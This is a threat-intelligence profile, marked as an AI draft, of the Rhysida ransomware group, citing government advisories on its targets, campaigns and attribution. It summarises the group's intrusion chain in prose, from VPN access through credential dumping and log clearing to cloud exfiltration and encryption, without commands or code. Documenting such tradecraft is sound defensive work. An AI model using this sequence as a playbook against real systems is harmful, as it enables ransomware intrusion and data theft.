AI Draft ACTIVE

Rhysida

Affiliation Cybercriminal (Ransomware)

Motivation Financial

Status active

Country Unknown

First Seen 2023

Last Seen 2025

Target Sectors Healthcare, Education, Manufacturing, Information Technology, Government

Target Geographies United States, Global

Executive Summary

Rhysida is a financially motivated ransomware operation that emerged in May 2023. The group operates as a ransomware-as-a-service (RaaS) affiliate model and pursues “targets of opportunity” across the education, healthcare, manufacturing, information technology, and government sectors. A November 2023 joint advisory from the FBI, CISA, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) disseminated Rhysida’s known indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs).

Open-source reporting has documented behavioral and infrastructure similarities between Rhysida operators and Vice Society (DEV-0832) actors. While these similarities have been noted in multiple vendor reports, they do not constitute confirmed group identity, and the available public evidence does not support treating Rhysida and Vice Society as interchangeable labels. Rhysida actors employ a double-extortion model: they encrypt victim data and simultaneously threaten to publish exfiltrated files on a Tor-based leak site unless a Bitcoin ransom is paid.

Notable Campaigns

2023–Present — Healthcare and Education Targeting

Rhysida has been observed targeting the healthcare and public health sector, prompting a specific sector alert from the U.S. Department of Health and Human Services (HHS). The group’s healthcare targeting has drawn government attention due to patient safety implications. CISA, FBI, and MS-ISAC investigations through December 2024 document a continuing operational pattern against healthcare organizations, with actors compromising VPN infrastructure and moving laterally before deploying the ransomware payload.

The education sector has also been a target, with Rhysida actors compromising universities and school districts using the same VPN-and-RDP lateral movement pattern documented in healthcare incidents. Government organizations and manufacturing firms have also been targeted.

2024–2025 — Continued Operations with Updated TTPs

CISA updated the Rhysida advisory in April 2025 to reflect new IOCs and TTPs employed by Rhysida associates, indicating the group remained operationally active through at least late 2024. Updated techniques include expanded use of AZCopy and Azure Storage Explorer for cloud-based data exfiltration, reflecting adaptation to cloud-based enterprise environments.

Technical Capabilities

Rhysida actors gain initial access primarily by authenticating to external-facing VPN services with compromised valid credentials. In some cases, Gootloader malware has been used for initial access. Once inside, actors conduct Active Directory reconnaissance using ADRecon and native tools including ipconfig, whoami, nltest, and net commands to enumerate domain structure and user accounts.

Lateral movement relies on RDP connections, PuTTY SSH tunneling, and PsExec for remote execution (T1569.002). Credential harvesting targets the NTDS.dit database, which is extracted via ntdsutil or secretsdump-style tooling, allowing actors to compromise domain-wide accounts. AnyDesk is deployed for persistent remote access.

Data staged for exfiltration is placed into designated in and out folders created on the C:\\ drive. Exfiltration leverages AZCopy and Azure Storage Explorer to transfer collected data to actor-controlled cloud storage. Prior to deploying the ransomware payload, actors clear Windows event logs using wevtutil to hinder forensic investigation.

The Rhysida ransomware binary is a 64-bit Windows PE compiled with MinGW/GCC. It injects into running processes before encrypting files with a 4096-bit RSA key combined with a ChaCha20 algorithm, appending a .rhysida extension to encrypted files. A PDF ransom note is dropped on the compromised system. Following encryption, the binary deletes itself via PowerShell from a hidden command window. Ransom payments are demanded in Bitcoin to actor-provided wallet addresses.

Attribution

Rhysida is documented through joint FBI, CISA, and MS-ISAC investigations with published IOCs and TTPs. No specific country attribution appears in available public government reporting, and no individual Rhysida operators have been publicly indicted as of the most recent advisory update. Vendor reporting has noted behavioral similarities with Vice Society but public evidence does not support confirmed group identity between the two.

Multiple independent government and vendor sources document this as a distinct operational cluster with consistent TTPs, but without a legal attribution or government country-level assignment.

MITRE ATT&CK Profile

Initial Access: Compromised valid credentials used to authenticate to VPN services (T1078); Gootloader malware for phishing-based initial access in some cases (T1566).

Discovery: Domain and network enumeration via ipconfig (T1016), whoami (T1033), nltest (T1482), and net commands (T1069.002); ADRecon for Active Directory reconnaissance.

Lateral Movement: Remote Desktop Protocol connections (T1021.001); PuTTY SSH tunneling (T1021.004); PsExec for remote execution (T1569.002).

Credential Access: NTDS.dit database dumping via ntdsutil (T1003.003) to extract domain-wide credential hashes.

Exfiltration: Data staged in local directories (T1074) before exfiltration via AZCopy and Azure Storage Explorer to actor-controlled cloud storage (T1567.002).

Command and Control: AnyDesk remote access tool (T1219) for persistent access.

Defense Evasion: Windows event log clearing via wevtutil (T1070); self-deletion of ransomware binary post-encryption (T1070.004); process injection prior to file encryption (T1055).

Impact: RSA-4096 + ChaCha20 data encryption (T1486); double extortion with threatened publication of exfiltrated data (T1657).